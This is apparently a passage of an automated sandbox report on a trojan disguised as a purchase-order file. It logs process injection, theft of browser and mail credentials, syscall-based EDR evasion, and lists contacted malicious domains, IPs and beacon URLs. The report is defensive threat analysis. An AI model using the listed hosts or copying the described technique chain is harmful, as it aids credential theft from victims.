                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeQueries volume information: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Scheduled Task/Job
                      11
                      Scheduled Task/Job
                      612
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      221
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      11
                      Scheduled Task/Job
                      11
                      Disable or Modify Tools
                      LSASS Memory2
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Abuse Elevation Control Mechanism
                      41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares1
                      Data from Local System
                      4
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading
                      612
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture4
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information
                      LSA Secrets2
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism
                      Cached Domain Credentials113
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563935 Sample: Pre Alert PO TVKJEANSA00967... Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 59 www.shipincheshi.today 2->59 61 www.elinor.club 2->61 63 4 other IPs or domains 2->63 75 Suricata IDS alerts for network traffic 2->75 77 Sigma detected: Scheduled temp file as task from temp location 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 11 other signatures 2->81 10 Pre Alert PO TVKJEANSA00967.bat.exe 7 2->10         started        14 STiokuWkiGFJ.exe 5 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\...\STiokuWkiGFJ.exe, PE32 10->51 dropped 53 C:\Users\...\STiokuWkiGFJ.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp63ED.tmp, XML 10->55 dropped 57 Pre Alert PO TVKJEANSA00967.bat.exe.log, ASCII 10->57 dropped 91 Writes to foreign memory regions 10->91 93 Allocates memory in foreign processes 10->93 95 Adds a directory exclusion to Windows Defender 10->95 97 Injects a PE file into a foreign processes 10->97 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        99 Multi AV Scanner detection for dropped file 14->99 101 Machine Learning detection for dropped file 14->101 25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 nhClcdOjQwJ.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 42 runas.exe 29->42         started        process11 signatures12 83 Tries to steal Mail credentials (via file / registry access) 42->83 85 Tries to harvest and steal browser information (history, passwords, etc) 42->85 87 Modifies the context of a thread in another process (thread injection) 42->87 89 3 other signatures 42->89 45 nhClcdOjQwJ.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 dojodigitize.shop 15.197.142.173, 49743, 80 TANDEMUS United States 45->65 67 www.alvinsd.buzz 139.162.181.76, 49803, 49810, 49817 LINODE-APLinodeLLCUS Netherlands 45->67 69 3 other IPs or domains 45->69 105 Found direct / indirect Syscall (likely to bypass EDR) 45->105 signatures15

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Pre Alert PO TVKJEANSA00967.bat.exe55%ReversingLabsByteCode-MSIL.Trojan.Genie8DN
                      Pre Alert PO TVKJEANSA00967.bat.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe55%ReversingLabsByteCode-MSIL.Trojan.Genie8DN
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.17jkgl.com/yjgs/0%Avira URL Cloudsafe
                      http://www.elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY=0%Avira URL Cloudsafe
                      http://www.elinor.club0%Avira URL Cloudsafe
                      http://elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL0%Avira URL Cloudsafe
                      http://www.shipincheshi.today/b20s/0%Avira URL Cloudsafe
                      http://www.elinor.club/7plr/0%Avira URL Cloudsafe
                      http://www.shipincheshi.today/b20s/?LRW=tVBfi4VbWyAR4A6JwX/2lnpR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u+as/M6yp5i3EDz3+5965KIAUeXyPV8KfzAH0F+33TTK6hNoSGlASxdt3tI0=&fvqp6=9vfXK0%Avira URL Cloudsafe
                      http://www.alvinsd.buzz/d43q/0%Avira URL Cloudsafe
                      http://www.dojodigitize.shop/3acc/?LRW=skYxN//30ryIi85Wi0QpETYUbcdPFuXI+97QewxhrY3NM2hqn6Sq2BPHPiKxfL80eN+v/gcRWuFAYeqrMVkPGGlMHJiH0BFPFC9u+m//81WV26UqMu5nMks=&fvqp6=9vfXK0%Avira URL Cloudsafe
                      http://www.17jkgl.com/yjgs/?LRW=5PllmvK0caJhA9qO+og5+P8kc5JWR+uQLy91XhuloCAo6K0czluNggt7J8fRT5aF3DbStYNhlgg+eys4IUnD8eH0N6/eozV0E04Jm3Q8YYXSei9vmTSoi+w=&fvqp6=9vfXK0%Avira URL Cloudsafe
                      http://www.thinkphp.cn0%Avira URL Cloudsafe
                      http://www.alvinsd.buzz/d43q/?fvqp6=9vfXK&LRW=qOy9fp5Cl0yUgYAEczO7dyJ+bxzOsQOuCHBFuR5y1LF4o9syCZkEzLGi7aZXV+ZbwDd0E0+zyiVRHPLTItQK1mi6x0nkeaPePZztRgCxUMm7wu9eAI3Dzhs=0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.shipincheshi.today
                      154.23.176.197
                      truetrue
                        unknown
                        www.17jkgl.com
                        38.6.78.235
                        truetrue
                          unknown
                          dojodigitize.shop
                          15.197.142.173
                          truetrue
                            unknown
                            www.alvinsd.buzz
                            139.162.181.76
                            truetrue
                              unknown
                              www.elinor.club
                              194.58.112.174
                              truetrue
                                unknown
                                www.dojodigitize.shop
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.17jkgl.com/yjgs/?LRW=5PllmvK0caJhA9qO+og5+P8kc5JWR+uQLy91XhuloCAo6K0czluNggt7J8fRT5aF3DbStYNhlgg+eys4IUnD8eH0N6/eozV0E04Jm3Q8YYXSei9vmTSoi+w=&fvqp6=9vfXKtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.elinor.club/7plr/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.shipincheshi.today/b20s/?LRW=tVBfi4VbWyAR4A6JwX/2lnpR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u+as/M6yp5i3EDz3+5965KIAUeXyPV8KfzAH0F+33TTK6hNoSGlASxdt3tI0=&fvqp6=9vfXKtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.17jkgl.com/yjgs/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.shipincheshi.today/b20s/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY=true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dojodigitize.shop/3acc/?LRW=skYxN//30ryIi85Wi0QpETYUbcdPFuXI+97QewxhrY3NM2hqn6Sq2BPHPiKxfL80eN+v/gcRWuFAYeqrMVkPGGlMHJiH0BFPFC9u+m//81WV26UqMu5nMks=&fvqp6=9vfXKtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.alvinsd.buzz/d43q/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.alvinsd.buzz/d43q/?fvqp6=9vfXK&LRW=qOy9fp5Cl0yUgYAEczO7dyJ+bxzOsQOuCHBFuR5y1LF4o9syCZkEzLGi7aZXV+ZbwDd0E0+zyiVRHPLTItQK1mi6x0nkeaPePZztRgCxUMm7wu9eAI3Dzhs=true
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabrunas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designersGPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers/?Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/bThePre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers?Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.tiro.comPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designersPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.goodfont.co.krPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sajatypeworks.comPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.typography.netDPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.comrunas.exe, 00000012.00000002.2943817151.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2945609383.0000000007200000.00000004.00000800.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.0000000003558000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cn/cThePre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.elinor.clubnhClcdOjQwJ.exe, 00000013.00000002.2944930407.0000000005308000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812739466.000000000607A000.00000004.00000020.00020000.00000000.sdmp, Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrunas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.galapagosdesign.com/DPleasePre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.fonts.comPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.krPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.urwpp.deDPleasePre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.zhongyicts.com.cnPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1805442128.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, STiokuWkiGFJ.exe, 00000009.00000002.1994696296.000000000274A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.sakkal.comPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.apache.org/licenses/LICENSE-2.0Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.fontbureau.comPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icorunas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lLrunas.exe, 00000012.00000002.2943817151.000000000550C000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.000000000387C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.ecosia.org/newtab/runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drfalse
                                                                                            high
                                                                                            http://www.carterandcone.comlPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ac.ecosia.org/autocomplete?q=runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.founder.com.cn/cnPre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
